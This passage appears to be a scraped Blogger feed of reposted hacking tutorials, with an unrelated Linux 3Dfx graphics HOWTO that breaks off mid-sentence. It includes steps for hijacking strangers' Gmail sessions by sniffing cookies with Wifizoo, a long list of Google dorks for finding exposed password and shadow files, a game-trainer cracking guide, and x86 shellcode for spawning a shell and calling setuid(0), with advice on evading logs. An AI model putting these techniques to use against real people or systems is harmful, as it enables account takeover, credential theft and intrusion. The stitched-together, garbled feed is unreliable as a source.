HTTP proxy on port 8080, then<br /><br />We can now return to the "Cookies" panel Wifizoo hotel. By clicking on the cookie gmail (all information about the cookie, in blue), wifizoo will automatically build on the currently used proxy on port 8080. The indication "Cookie Set!" shows that the cookie has been forged and can be reused><br /><br />Then simply click jump to it will take u to Google.com then click mail.<br /><br />you r done u have Sniffed others cookies.<br /><br />So never use Unsecure Wireless Networks,<br /><br />Be secure Stay secure ;)<br /><br />Author : rez.http://www.blogger.com/profile/11632901016120998126noreply@blogger.com0tag:blogger.com,1999:blog-5375501825270350941.post-38246483406433708592009-06-27T05:54:00.001-07:002009-06-27T05:54:29.338-07:00Google HackingNo need of explanatino any more ,,, <br /> <br />newbis b careful <br /> <br />note :_ plz use proxy to visit any site u get thru search : <br /> <br /> <br />filetype:htpasswd htpasswd <br />intitle:"index of" ".htpasswd" -intitle:"dist" -apache -htpasswd.c <br />index.of.private (algo privado) <br />intitle:index.of master.passwd <br />inurlasslist.txt (para encontrar listas de passwords) <br />intitle:"index of..etc" passwd <br />intitle:admin intitle:login <br />"incorrect syntax near" (sql script error) <br />intitle:"the page cannot be found" inetmgr (debilidad en iis4) <br />intitle:index.of ws_ftp.ini <br />"supplied arguments is not a valid postgresql result" (possible debilidad sql) <br />_vti_pvt password intitle:index.of (frontpage) <br />inurl:backup intitle:index.of inurl:admin <br />"index of /backup" <br />index.of.password <br />index.of.winnt <br /> <br />inurl:"auth_user_file.txt" <br />"index of /admin" <br />"index of /password" <br />"index of /mail" <br />"index of /" +passwd <br />index of /" +.htaccess <br />index of ftp +.mdb allinurl:/cgi-bin/ +mailto <br />allintitle: "index of/admin" <br />allintitle: "index of/root" <br />allintitle: sensitive filetype:doc <br />allintitle: restricted filetype :mail <br />allintitle: restricted filetype:doc site:gov <br />administrator.pwd.index <br />authors.pwd.index <br />service.pwd.index <br />filetype:config web <br />gobal.asax index <br />inurlasswd filetype:txt <br />inurl:admin filetype:db <br />inurl:iisadmin <br />inurl:"auth_user_file.txt" <br />inurl:"wwwroot/*." <br />allinurl: winnt/system32/ (get cmd.exe) <br />allinurl:/bash_history <br />intitle:"index of" .sh_history <br />intitle:"index of" .bash_history <br />intitle:"index of" passwd <br />intitle:"index of" people.1st <br />intitle:"index of" pwd.db <br />intitle:"index of" etc/shadow <br />intitle:"index of" spwd <br />intitle:"index of" master.passwd <br />intitle:"index of" htpasswd <br />intitle:"index of" members or accounts <br />intitle:"index of" user_carts or user _cart.http://www.blogger.com/profile/11632901016120998126noreply@blogger.com1tag:blogger.com,1999:blog-5375501825270350941.post-60272297857681232332009-06-27T05:53:00.001-07:002009-06-27T05:53:40.751-07:00Game HackingTools used:<br />-----------<br /><br />- OllyDbg + plugins<br />- ImpREC<br />- Cheat Engine 5.3<br />- SnagIt<br /><br />Description:<br />-----------<br /><br />[1/4] How to use WriteProcessMemory to sniff trainers<br />[2/4] How to apply the above if game updates and you can't find any working trainers<br />[3/4] Basic exporting of code-caves and basic functionality of Cheat Engine (auto-assembler, scripting and making a trainer on the fly)<br />[4/4] Getting rid of stupid egotistic nags of releasers (Myth, DEViANCE etc...), basic UPX unpacking...<br /><br />All tutorials have as target the game called Sacred from Ascaron, but are meant for any game !<br /><br />First tutorial:<br />-------------<br />- I used sheep's mega-trainer as a reference;<br />* side-note : This is addressed to all sites stating that his trainer is for v1.0; WRONG! It's for v1.02 !!! *<br />- Olly + WriteProcessMemory and sniffed what it writes to the game;<br /><br />Second tutorial:<br />---------------<br />- Explained how sheep's one-sided god mode works;<br />- Basic exporting of code to clipboard;<br />- Used SnagIt to get a snapshot of the game code, at "god mode" address;<br /><br />Third tutorial:<br />-------------<br />- "Updated" game from v1.02 to v1.8.6<br />- Purpose : update sheep's trainer for WHINERS (OMG! I can't find a working trainer - guess what, now you can update the sh!t on your own)<br />- Basic Cheat Engine scripting based on sheep's code-cave;<br />- On-the-fly trainer making with CE's engine;<br /><br />Fourth tutorial:<br />--------------<br />- Myth releases are a pain in the ass;<br />- They pack their files and add .dlls along with them, .dlls which have as purpose blowing a gay nag in the face of the user :|<br />- Taught how to use Olly to manage basic UPX unpacking and getting rid of the nag;<br /><br />BIG n0Tes:<br />-----------<br />1. Sniffing is for teaching purposes, and is meant to help those who don't have working trainers for updated versions of any game available. If you're caught riping code, you're toasted. We know it when we see it !<br />2. Excuse any typos or mistakes.<br />3. Greetz fly out to team Extalia and to sheep for his tremendous work !.http://www.blogger.com/profile/11632901016120998126noreply@blogger.com1tag:blogger.com,1999:blog-5375501825270350941.post-54599863684626752362009-06-27T05:51:00.000-07:002009-06-27T05:52:51.088-07:00Understanding Email Security AnonimityWhen we are talking about protecting email privacy and anonymity we consider that it can be compromised by message interception or an email message contains information that the sender was not intending to pass to the recipient. In this article we will try to explain how email system works, what information can be extracted from regular email message, and how email privacy can be protected.<br /><br />1. Email privacy - how can it be compromised?<br /><br />Before we continue with topics on how to protect email privacy, we should understand how the email system works and what are the issues related to email privacy.<br /><br />How the email system works.<br />Most common way of sending email is using the ISP (Internet Service Provider) or company mail server. When you click on "send" button, your email software will establish an SMTP (SMTP stands for Simple Mail Transfer Protocol) connection to your email server. Server will attempt to deliver a message directly to your recipient ISP mail server, but in case this server is not accessible at the moment it will deliver the message to the intermediate email server known as MX relay host. After traveling through the MX hosts, message will be delivered to recipient mailbox on his/her ISP mail server. It will be stored there until your recipient retrieves the message using POP (Post Office Protocol) or IMAP (Internet Message Access Protocol) protocol. This is how your email message travels through the Internet from the sender's computer to the recipient's computer. The same way web mail service work, but instead of email software you would need to use web interface to compose or read emails.<br /><br />How can an email message be intercepted?<br />Where it can be intercepted? It can be intercepted at each step along the way. Email message is stored on two servers on its way at least: on sender ISP mail server and on recipient ISP mail server. When traveling through the MX hosts, message is stored on each of MX hosts. When your mail is addressed to the bank, investment company, business partners, it can attract attention of IT staff that perform mail server monitoring. And there is nothing that can prevent unscrupulous IT staff with access to the mail server to open and read that message. Other problem is that unauthorized personnel or hackers can have access to the mail server where physical access security and network security are weak.<br />There is another way to intercept email messages: network traffic interception. In most cases network traffic monitoring is performed by government agencies at ISP level. Email traffic can be rated according to keywords to "suspicious" and stored for later review by government agencies staff – this is how US Carnivore system works.<br /><br />Email headers anonymity.<br />When analyzing email message we can get lot of information about its sender. Computer IP address, geographic location, time zone, language preferences, computer LAN name, email software used etc., – all this information can be found in email message. And an important point is that all this info is being passed without sender's knowing about it. Well, what is bad about it, you can ask. This will depend on the way this information can be used. For example, you may not wish your recipient to know that your operating system uses Dutch language as default (e.g. your native language is Dutch), or that you are in Australia now and use one of the local ISPs services. All this information can be easily extracted from the email message headers.<br />Every email message consists of two parts: message header and message body.<br />Header part can be compared to a letter envelope. It contains message subject, sender's and recipient's email addresses, date and time message was sent and arrived, lists the points your message went through on its way to recipient. Message headers also contain service information about sender's email software. This information is used to deliver message, and allow tech staff to debug email problems when they occur.<br /><br />Here is an example message headers:<br /><br />Return-Path: <customer@somedomain.com><br />Received: from [192.168.157.3] by web5203.mail.foobar.com; Sat, 21 Nov 2003 12:42:20 –0800 PST<br />Message-ID: <2003114546184545.45639.qmail@foobar.com><br />Date: Sat, 21 Nov 2003 12:42:20 -0800 (PST)<br />From: "Peter J. Smith" <customer@somedomain.com><br />Subject: My Private Message<br />To: example@yahooo.com<br />MIME-Version: 1.0<br />Content-Type: text/html;charset="GB2312"<br />X-Mailer: Microsoft Outlook Express 5.00.2615.2000<br /><br /><br /><br /><br />And here is the information we can extract from the headers (using it to draw a picture of the sender):<br />Sender IP address: [192.168.157.3] points to the sender's computer. Anyone can get further details about ISP (address, phone, fax, email) running a search through the WHOIS databases.<br />Sender ISP: "web5203.mail.foobar.com" and "@foobar.com" – message was sent using web interface from foobar.com (further details available at the website)<br />Senders email software: Microsoft Outlook Express 5.00.2615.2000 (this version's known bugs could be used for sending a troyan to the computer)<br />Senders local time zone: -0800 (PST) US Pacific coast (points to the geographic location of the computer)<br />Senders native language: charset="GB2312" – Chinese char set (the user's probably a member of the local Chinese community)<br /><br />It should be noted, that only three lines in the message headers were explicitly supplied by the sender: "from" address, "to" address and "subject" line. All other data was inserted by email software and intermediate servers. Usually users have no control over these headers, but these headers are the most dangerous for email privacy and contain lot of information about the sender. There is no problem to track the message sender using headers data.<br /><br />Secure email software.<br />Using right email software is an important point for email security. If you are using buggy email software you are open to hacker attacks since email message contains your email software vendor and version number. There will be enough info to write a specially formatted (to use your email software security vulnerabilities) message to hung your computer or infect it by Trojan. If somebody suspects you to store confidential information on your computer he/she can try to hack in to get it. All the attacker needs to start is your IP address from email message header. Using security holes in your computer software (new Windows vulnerabilities are published almost daily) attacker can gain full access to your computer and in worst case obtain all your email passwords, banking and investment account data, private correspondence, business data etc. All this horror scenarios are not a myth but today's reality, just search on Google on companies offering spying over the Internet. If your competitors can afford spending hundred dollars to know your secrets you are in danger.<br /><br />Web bugs.<br />How can be web browsing related to emailing you may ask? It's simple. Most of email applications are capable to display HTML formatted email messages. This is not different from viewing a regular web page, but the web page is displayed in your email software window, not in a browser. When viewing web pages in your email window you are taking the same risk as when browsing, e.g. you have to deal with cookies, Java Scripts, Java, ActiveX controls, etc. IP anonymity and data interception issues should be taken into consideration as well.<br /><br />There is one popular spying technique: web bugs. To illustrate how they work let us imagine that you are running some online business and have received an email message (possibly business related) form some unknown person:<br /><br />From: someuser@yahoo.com<br /> To: customer@foobar.com<br /> Subject: Hello!<br /> Hello!<br /> How are you?<br /> I'm fine.<br /> David.<br /><br /><br /><br /><br />To attract your attention your full name or your company name can be written in "Subject" line. You have opened this message, and after reading it and considering it to be spam you through it away. But you have not noticed that the message was HTML formatted, and it contained an image. Dot symbol after the word "fine" was replaced by a small image, and that image was automatically downloaded from some website by your email software when you had opened the message. Now, the email sender after analyzing web server logs can get some information on you: date and time you have read this email, your IP address, operating system, etc.<br />All this means that your email privacy can be compromised when you simply open an email message, even without replying to it.<br /><br />2. How to protect your email privacy.<br />Even if you have nothing to hide it is a good idea to take care of your email privacy. We have developed recommendations on how to make emailing secure and private as much as possible.<br /><br />2.1 Use encryption to protect your email messages. The only way to protect email messages from the interception is to encrypt them. There are few techniques to do so.<br /><br />* PGP and S\MIME encryption. Both PGP and S\MIME encryption are used to encrypt message body only, leaving message headers unprotected. PGP and S\MIME can be used if you require end-to-end encryption. Using those methods requires prior agreement between parties, and "public key" exchange should be done before emailing securely.<br />* SSL encrypted connection to mail server. SSL can be successfully used to encrypt email traffic in the whole. SSL encrypted transport prevents from message headers and message body interception on the way to/from the mail server while sending/receiving email. SSL can be used to effectively protect from intercepting your email traffic by ISP or government agencies.<br /><br />Please note, PGP and S\MIME do not provide anonymity. Even if you encrypt email messages with PGP or S/MIME the message headers still remain open, and will be transferred in clear text through the Internet. You have to understand that unencrypted "To:", "From:", "Subject:", etc. fields may disclose your identity and can contain confidential information. In addition to PGP or S/MIME, SSL connection<br /></customer@somedomain.com></customer@somedomain.com>.http://www.blogger.com/profile/11632901016120998126noreply@blogger.com1tag:blogger.com,1999:blog-5375501825270350941.post-29644402559389331292009-06-27T05:50:00.001-07:002009-06-27T05:50:58.023-07:00Fake Your IP with SSH Tunnelier & SSH Host AccountFake Your IP with SSH Tunnelier & SSH Host Account<br /><br />Video Guilde Download Link:<br />http://rapidshare.com/files/208132514/SSH_SOCK_Tunnelier.rar<br />File Name: SSH_SOCK_Tunnelier.rar<br />Size: 2002 KB<br />Status: Normal Download<br /><br />First We need to install Bitvise Tunnelier software (required)<br />And and SSH host Account (or SSH File Save)<br />- You can download the Tunnelier for FREE at www.bitvise.com<br />- Then install it on your PC<br />Download Link:<br />http://dl.bitvise.com/Tunnelier-Inst.exe<br />Mirror:<br />http://dl.bitvise.com.s3-external-3.amazonaws.com/Tunnelier-Inst.exe<br /><br />- Here I show how to use SSH Sock with a SSH File Save<br />- That is SSH File Save, open it. With SSH File Save you no need to do anything than run it by click Login<br />- before using just check what port of the SSH File Save<br />Click Services and see what port ^^... here is 7210<br />- OK now run the SSH File Save by click Login<br />- OK and it said succeeded. (we successfully connected with SSH host account)<br /><br />Now change your Browser Setting to use with SSH to fake your IP<br />(we can Minimize the SSH File Save).<br />- In browser, at SOCKS HOST (Sock IP) must always use:<br />127.0.0.1<br />- And the Port is the SSH Port. Sock type is SOCK5<br />- Then check our IP after faking at http://ip-address.domaintools.com<br />- And we have done ^^<br /><br />Remember keep the SSH File Save run and how to know the SSH run or NOT? It's very simple, just look the small icon of the SSH Sock at the Taskbar ...<br />When you need to remove faking SSH Sock, just simply do as me ... And we have done.http://www.blogger.com/profile/11632901016120998126noreply@blogger.com3tag:blogger.com,1999:blog-5375501825270350941.post-34496344060591121212009-06-27T05:48:00.000-07:002009-06-27T05:49:27.324-07:00Advanced Shellcoding TechniquesIntroduction<br /><br />This paper assumes a working knowledge of basic shellcoding techniques, and x86 assembly, I will not rehash these in this paper. I hope to teach you some of the lesser known shellcoding techniques that I have picked up, which will allow you to write smaller and better shellcodes. I do not claim to have invented any of these techniques, except for the one that uses the div instruction.<br /><br /><br /><br />The multiplicity of mul<br /><br />This technique was originally developed by Sorbo of darkircop.net. The mul instruction may, on the surface, seem mundane, and it's purpose obvious. However, when faced with the difficult challenge of shrinking your shellcode, it proves to be quite useful. First some background information on the mul instruction itself.<br /><br />mul performs an unsigned multiply of two integers. It takes only one operand, the other is implicitly specified by the %eax register. So, a common mul instruction might look something like this:<br /><br />movl $0x0a,%eax<br />mul $0x0a<br /><br />This would multiply the value stored in %eax by the operand of mul, which in this case would be 10*10. The result is then implicitly stored in EDX:EAX. The result is stored over a span of two registers because it has the potential to be considerably larger than the previous value, possibly exceeding the capacity of a single register(this is also how floating points are stored in some cases, as an interesting sidenote).<br /><br />So, now comes the ever-important question. How can we use these attributes to our advantage when writing shellcode? Well, let's think for a second, the instruction takes only one operand, therefore, since it is a very common instruction, it will generate only two bytes in our final shellcode. It multiplies whatever is passed to it by the value stored in %eax, and stores the value in both %edx and %eax, completely overwriting the contents of both registers, regardless of whether it is necessary to do so, in order to store the result of the multiplication. Let's put on our mathematician hats for a second, and consider this, what is the only possible result of a multiplication by 0? The answer, as you may have guessed, is 0. I think it's about time for some example code, so here it is:<br /><br />xorl %ecx,%ecx<br />mul %ecx<br /><br />What is this shellcode doing? Well, it 0's out the %ecx register using the xor instruction, so we now know that %ecx is 0. Then it does a mul %ecx, which as we just learned, multiplies it's operand by the value in %eax, and then proceeds to store the result of this multiplication in EDX:EAX. So, regardless of %eax's previous contents, %eax must now be 0. However that's not all, %edx is 0'd now too, because, even though no overflow occurs, it still overwrites the %edx register with the sign bit(left-most bit) of %eax. Using this technique we can zero out three registers in only three bytes, whereas by any other method(that I know of) it would have taken at least six.<br /><br /><br />The div instruction<br /><br />Div is very similar to mul, in that it takes only one operand and implicitly divides the operand by the value in %eax. Also like, mul it stores the result of the divide in %eax. Again, we will require the mathematical side of our brains to figure out how we can take advantage of this instruction. But first, let's think about what is normally stored in the %eax register. The %eax register holds the return value of functions and/or syscalls. Most syscalls that are used in shellcoding will return -1(on failure) or a positive value of some kind, only rarely will they return 0(though it does occur). So, if we know that after a syscall is performed, %eax will have a non-zero value, and that the instruction divl %eax will divide %eax by itself, and then store the result in %eax, we can say that executing the divl %eax instruction after a syscall will put the value 1 into %eax. So...how is this applicable to shellcoding? Well, their is another important thing that %eax is used for, and that is to pass the specific syscall that you would like to call to int $0x80. It just so happens that the syscall that corresponds to the value 1 is exit(). Now for an example:<br /><br /> <br />xorl %ebx,%ebx<br />mul %ebx<br />push %edx<br />pushl $0x3268732f<br />pushl $0x6e69622f<br />mov %esp, %ebx<br />push %edx<br />push %ebx<br />mov %esp,%ecx<br />movb $0xb, %al #execve() syscall, doesn't return at all unless it fails, in which case it returns -1<br />int $0x80<br /><br />divl %eax # -1 / -1 = 1<br />int $0x80<br /><br />Now, we have a 3 byte exit function, where as before it was 5 bytes. However, there is a catch, what if a syscall does return 0? Well in the odd situation in which that could happen, you could do many different things, like inc %eax, dec %eax, not %eax anything that will make %eax non-zero. Some people say that exit's are not important in shellcode, because your code gets executed regardless of whether or not it exits cleanly. They are right too, if you really need to save 3 bytes to fit your shellcode in somewhere, the exit() isn't worth keeping. However, when your code does finish, it will try to execute whatever was after your last instruction, which will most likely produce a SIG ILL(illegal instruction) which is a rather odd error, and will be logged by the system. So, an exit() simply adds an extra layer of stealth to your exploit, so that even if it fails or you can't wipe all the logs, at least this part of your presence will be clear.<br /><br /><br /><br />Unlocking the power of leal<br /><br />The leal instruction is an often neglected instruction in shellcode, even though it is quite useful. Consider this short piece of shellcode.<br /><br />xorl %ecx,%ecx<br />leal 0x10(%ecx),%eax<br /><br />This will load the value 17 into eax, and clear all of the extraneous bits of eax. This occurs because the leal instruction loads a variable of the type long into it's desitination operand. In it's normal usage, this would load the address of a variable into a register, thus creating a pointer of sorts. However, since ecx is 0'd and 0+17=17, we load the value 17 into eax instead of any kind of actual address. In a normal shellcode we would do something like this, to accomplish the same thing:<br /><br />xorl %eax,%eax<br />movb $0x10,%eax<br /><br />I can hear you saying, but that shellcode is a byte shorter than the leal one, and you're quite right. However, in a real shellcode you may already have to 0 out a register like ecx(or any other register), so the xorl instruction in the leal shellcode isn't counted. Here's an example:<br /><br />xorl %eax,%eax<br />xorl %ebx,%ebx<br />movb $0x17,%al<br />int $0x80<br /> <br />xorl %ebx,%ebx<br />leal 0x17(%ebx),%al<br />int $0x80<br /><br />Both of these shellcodes call setuid(0), but one does it in 7 bytes while the other does it in 8. Again, I hear you saying but that's only one byte it doesn't make that much of a difference, and you're right, here it doesn't make much of a difference(except for in shellcode-size pissing contests =p), but when applied to much larger shellcodes, which have many function calls and need to do things like this frequently, it can save quite a bit of space.<br /><br /><br /><br />Conclusion<br /><br />I hope you all learned something, and will go out and apply your knowledge to create smaller and better shellcodes. If you know who invented the leal technique, please tell me and I will credit him/her..http://www.blogger.com/profile/11632901016120998126noreply@blogger.com0tag:blogger.com,1999:blog-5375501825270350941.post-60712627097180682782009-06-27T05:45:00.000-07:002009-06-27T05:46:25.745-07:003Dfx graphics accelerator chip support for Linux.1. Introduction<br /><br /> This is the Linux 3Dfx HOWTO document. It is intended as a quick<br /> reference covering everything you need to know to install and<br /> configure 3Dfx support under Linux. Frequently asked questions<br /> regarding the 3Dfx support are answered, and references are given to<br /> some other sources of information on a variety of topics related to<br /> computer generated, hardware accelerated 3D graphics.<br /><br /> This information is only valid for Linux on the Intel platform. Some<br /> information may be applicable to other processor architectures, but I<br /> have no first hand experience or information on this. It is only<br /> applicable to boards based on 3Dfx technology, any other graphics<br /> accelerator hardware is beyond the scope of this document.<br /><br /><br /><br /> 1.1. Contributors and Contacts<br /><br /> This document would not have been possible without all the information<br /> contributed by other people - those involved in the Linux Glide port<br /> and the beta testing process, in the development of Mesa and the Mesa<br /> Voodoo drivers, or rewieving the document on behalf of 3Dfx and<br /> Quantum3D. Some of them contributed entire sections to this document.<br /><br /> Daryll Strauss daryll@harlot.rb.ca.us did the port, Paul J. Metzger<br /> pjm@rbd.com modified the Mesa Voodoo driver (written by David<br /> Bucciarelli tech.hmw@plus.it) for Linux, Brian Paul brianp@RA.AVID.COM<br /> integrated it with his famous Mesa library. With respect to Voodoo<br /> Graphics (tm) accelerated Mesa, additional thanks has to go to Henri<br /> Fousse, Gary McTaggart, and the maintainer of the 3Dfx Mesa for DOS,<br /> Charlie Wallace Charlie.Wallace@unistudios.com. The folks at 3Dfx,<br /> notably Gary Sanders, Rod Hughes, and Marty Franz, provided valuable<br /> input, as did Ross Q. Smith of Quantum3D. The pages on the Voodoo<br /> Extreme and Operation 3Dfx websites provided useful info as well, and<br /> in some case I relied on the 3Dfx local Newsgroups. The Linux glQuake2<br /> port that uses Linux Glide and Mesa is maintained by Dave Kirsch<br /> zoid@idsoftware.com. Thanks to all those who sent e-mail regarding<br /> corrections and updates, and special thanks to Mark Atkinson for<br /> reminding me of the dual cable setup.<br /><br /> Thanks to the SGML-Tools package (formerly known as Linuxdoc-SGML),<br /> this HOWTO is available in several formats, all generated from a<br /> common source file. For information on SGML-Tools see its homepage at<br /> pobox.com/~cg/sgmltools.<br /><br /><br /><br /> 1.2. Acknowledgments<br /><br /> 3Dfx, the 3Dfx Interactive logo, Voodoo Graphics (tm), and Voodoo Rush<br /> (tm) are registered trademarks of 3Dfx Interactive, Inc. Glide,<br /> TexUS, Pixelfx and Texelfx are trademarks of 3Dfx Interactive, Inc.<br /> OpenGL is a registered trademark of Silicon Graphics. Obsidian is a<br /> trademark of Quantum3D. Other product names are trademarks of the<br /> respective holders, and are hereby considered properly acknowledged.<br /><br /><br /> 1.3. Revision History<br /><br /><br /> Version 1.03<br /> First version for public release.<br /><br /> Version 1.16<br /> Current version v1.16 6 February 1998.<br /><br /><br /><br /> 1.4. New versions of this document<br /><br /> You will find the most recent version of this document at<br /> www.gamers.org/dEngine/xf3D/.<br /><br /> New versions of this document will be periodically posted to the<br /> comp.os.linux.answers newsgroup. They will also be uploaded to various<br /> anonymous ftp sites that archive such information including<br /> ftp://sunsite.unc.edu/pub/Linux/docs/HOWTO/.<br /><br /> Hypertext versions of this and other Linux HOWTOs are available on<br /> many World-Wide-Web sites, including sunsite.unc.edu/LDP/. Most Linux<br /> CD-ROM distributions include the HOWTOs, often under the<br /> /usr/doc/directory, and you can also buy printed copies from several<br /> vendors.<br /><br /> If you make a translation of this document into another language, let<br /> me know and I'll include a reference to it here.<br /><br /><br /><br /> 1.5. Feedback<br /><br /> I rely on you, the reader, to make this HOWTO useful. If you have any<br /> suggestions, corrections, or comments, please send them to me (<br /> bk@gamers.org), and I will try to incorporate them in the next<br /> revision. Please add HOWTO 3Dfx to the Subject-line of the mail, so<br /> procmail will dump it in the appropriate folder.<br /><br /> Before sending bug reports or questions, please read all of the<br /> information in this HOWTO, and send detailed information about the<br /> problem.<br /><br /> If you publish this document on a CD-ROM or in hardcopy form, a<br /> complimentary copy would be appreciated. Mail me for my postal<br /> address. Also consider making a donation to the Linux Documentation<br /> Project to help support free documentation for Linux. Contact the<br /> Linux HOWTO coordinator, Tim Bynum (linux-howto@sunsite.unc.edu), for<br /> more information.<br /><br /><br /><br /> 1.6. Distribution Policy<br /><br /> Copyright (c) 1997, 1998 by Bernd Kreimeier. This document may be<br /> distributed under the terms set forth in the LDP license at<br /> sunsite.unc.edu/LDP/COPYRIGHT.html.<br /><br /> This HOWTO is free documentation; you can redistribute it and/or<br /> modify it under the terms of the LDP license. This document is<br /> distributed in the hope that it will be useful, but without any<br /> warranty; without even the implied warranty of merchantability or<br /> fitness for a particular purpose. See the LDP license for more<br /> details.<br /><br /><br /><br /> 2. Graphics Accelerator Technology<br /><br /> 2.1. Basics<br /><br /> This section gives a very cursory overview of computer graphics<br /> accelerator technology, in order to help you understand the concepts<br /> used later in the document. You should consult e.g. a book on OpenGL<br /> in order to learn more.<br /><br /><br /> 2.2. Hardware configuration<br /><br /> Graphics accelerators come in different flavors: either as a separate<br /> PCI board that is able to pass through the video signal of a (possibly<br /> 2D or video accelerated) VGA board, or as a PCI board that does both<br /> VGA and 3D graphics (effectively replacing older VGA controllers).<br /> The 3Dfx boards based on the Voodoo Graphics (tm) belong to the former<br /> category. We will get into this again later.<br /><br /><br /> If there is no address conflict, any 3D accelerator board could be<br /> present under Linux without interfering, but in order to access the<br /> accelerator, you will need a driver. A combined 2D/3D accelerator<br /> might behave differently.<br /><br /><br /> 2.3. A bit of Voodoo Graphics (tm) architecture<br /><br /> Usually, accessing texture memory and frame/depth buffer is a major<br /> bottleneck. For each pixel on the screen, there are at least one<br /> (nearest), four (bi-linear), or eight (tri-linear mipmapped) read<br /> accesses to texture memory, plus a read/write to the depth buffer, and<br /> a read/write to frame buffer memory.<br /><br /> The Voodoo Graphics (tm) architecture separates texture memory from<br /> frame/depth buffer memory by introducing two separate rendering<br /> stages, with two corresponding units (Pixelfx and Texelfx), each<br /> having a separate memory interface to dedicated memory. This gives an<br /> above-average fill rate, paid for restrictions in memory management<br /> (e.g. unused framebuffer memory can not be used for texture caching).<br /><br /> Moreover, a Voodoo Graphics (tm) could use two TMU's (texture<br /> management or texelfx units), and finally, two Voodoo Graphics (tm)<br /> could be combined with a mechanism called Scan-Line Interleaving<br /> (SLI). SLI essentially means that each Pixelfx unit effectively<br /> provides only every other scanline, which decreases bandwidth impact<br /> on each Pixelfx' framebuffer memory.<br /><br /><br /><br /> 3. Installation<br /><br /> Configuring Linux to support 3Dfx accelerators involves the following<br /> steps:<br /><br /> 1. Installing the board.<br /><br /> 2. Installing the Glide distribution.<br /><br /> 3. Compiling, linking and/or running the application.<br /><br /> The next sections will cover each of these steps in detail.<br /><br /><br /> 3.1. Installing the board<br /><br /> Follow the manufacturer's instructions for installing the hardware or<br /> have your dealer perform the installation. It should not be necessary<br /> to select settings for IRQ, DMA channel, either Plug&Pray (tm) or<br /> factory defaults should work. The add-on boards described here are<br /> memory mapped devices and do not use IRQ's. The only kind of conflict<br /> to avoid is memory overlap with other devices.<br /><br /> As 3Dfx does not develop or sell any boards, do not contact them on<br /> any problems.<br /><br /><br /> 3.1.1. Troubleshooting the hardware installation<br /><br /> To check the installation and the memory mapping, do cat /proc/pci.<br /> The output should contain something like<br /><br /> ______________________________________________________________________<br /> Bus 0, device 12, function 0:<br /> VGA compatible controller: S3 Inc. Vision 968 (rev 0).<br /> Medium devsel. IRQ 11.<br /> Non-prefetchable 32 bit memory at 0xf4000000.<br /><br /> Bus 0, device 9, function 0:<br /> Multimedia video controller: Unknown vendor Unknown device (rev 2).<br /> Vendor id=121a. Device id=1.<br /> Fast devsel. Fast back-to-back capable.<br /> Prefetchable 32 bit memory at 0xfb000000.<br /> ______________________________________________________________________<br /><br /><br /> for a Diamond Monster 3D used with a Diamond Stealth-64. Additionally<br /> a cat /proc/cpuinfo /proc/meminfo might be helpfull for tracking down<br /> conflicts and/or submitting a bug report.<br /><br /> With current kernels, you will probably get a boot warning like<br /><br /> ______________________________________________________________________<br /> Jun 12 12:31:52 hal kernel: Warning : Unknown PCI device (121a:1).<br /> Please read include/linux/pci.h<br /> ______________________________________________________________________<br /><br /><br /> which could be safely ignored. If you happen to have a board not very<br /> common, or have encountered a new revision, you should take the time<br /> to follow the advice in /usr/include/linux/pci.h and send all neces-<br /> sary information to linux-pcisupport@cao-vlsi.ibp.fr.<br /><br /> If you experience any problems with the board, you should try to<br /> verify that DOS and/or Win95 or NT support works. You will probably<br /> not receive any useful response from a board manufacturer on a bug<br /> report or request regarding Linux. Having dealt with the Diamond<br /> support e-mail system, I would not expect useful responses for other<br /> operating systems either.<br /><br /><br /> 3.1.2. Configuring the kernel<br /><br /> There is no kernel configuration necessary, as long as PCI support is<br /> enabled. The Linux Kernel HOWTO<br /> <http://sunsite.unc.edu/mdw/HOWTO/Kernel-HOWTO.html> should be<br /> consulted for the details of building a kernel.<br /><br /><br /><br /> 3.1.3. Configuring devices<br /><br /> The current drivers do not (yet) require any special devices. This is<br /> different from other driver developments (e.g. the sound drivers,<br /> where you will find a /dev/dsp and /dev/audio). The driver uses the<br /> /dev/mem device which should always be available. In consequence, you<br /> need to use setuid or root privileges to access the accelerator board.<br /><br /><br /> 3.2. Setting up the Displays<br /><br /> There are two possible setups with add-on boards. You could either<br /> pass-through the video signal from your regular VGA board via the<br /> accelerator board to the display, or you could use two displays at the<br /> same time. Rely to the manual provided by the board manufacturer for<br /> details. Both configurations have been tried with the Monster 3D<br /> board.<br /><br /><br /> 3.2.1. Single screen display solution<br /><br /> This configuration allows you to check basic operations of the<br /> accelerator board - if the video signal is not transmitted to the<br /> display, hardware failure is possible.<br /><br /> Beware that the video output signal might deteoriate significantly if<br /> passed through the video board. To a degree, this is inevitable.<br /> However, reviews have complained about below-average of the cables<br /> provided e.g. with the Monster 3D, and judging from the one I tested,<br /> this has not changed.<br /><br /> There are other pitfalls in single screen configurations. Switching<br /> from the VGA display mode to the accelerated display mode will change<br /> resolution and refresh rate as well, even if you are using 640x480<br /> e.g. with X11, too. Moreover, if you are running X11, your<br /> application is responsible for demanding all keyboard and mouse<br /> events, or you might get stuck because of changed scope and exposure<br /> on the X11 display (that is effectively invisible when the accelerated<br /> mode is used) You could use SVGA console mode instead of X11.<br /><br /> If you are going to use a single screen configuration and switch modes<br /> often, remember that your monitor hardware might not enjoy this kind<br /> of use.<br /><br /><br /><br /> 3.2.2. Single screen dual cable setup<br /><br /> Some high end monitors (e.g. the EIZO F-784-T) come with two<br /> connectors, one with 5 BNC connectors for RGB, HSync, VSync, the other<br /> e.g. a regular VGA or a 13W3 Sub-D VGA. These displays usually also<br /> feature a front panel input selector to safely switch from one to the<br /> other. It is thus possible to use e.g. a VGA-to-BNC cable with your<br /> high end 2D card, and a VGA-to-13W3 Sub-D cable with your 3Dfx, and<br /> effectively run dual screen on one display.<br /><br /><br /> 3.2.3. Dual screen display solution<br /><br /> The accelerator board does not need the VGA input signal. Instead of<br /> routing the common video output through the accelerator board, you<br /> could attach a second monitor to its output, and use both at the same<br /> time. This solution is more expensive, but gives best results, as your<br /> main display will still be hires and without the signal quality losses<br /> involved in a pass-through solution. In addition, you could use X11<br /> and the accelerated full screen display in parallel, for development<br /> and debugging.<br /><br /> A common problem is that the accelerator board will not provide any<br /> video signal when not used. In consequence, each time the graphics<br /> application terminates, the hardware screensave/powersave might kick<br /> in depending on your monitors configuration. Again, your hardware<br /> might not enjoy being treated like this. You should use<br /><br /> ______________________________________________________________________<br /> setenv SST_DUALSCREEN 1<br /> ______________________________________________________________________<br /><br /><br /> to force continued video output in this setup.<br /><br /><br /> 3.3. Installing the Glide distribution<br /><br /> The Glide driver and library are provided as a single compressed<br /> archive. Use tar and gzip to unpack, and follow the instructions in<br /> the README and INSTALL accompanying the distribution. Read the<br /> install script and run it. Installation puts everything in<br /> 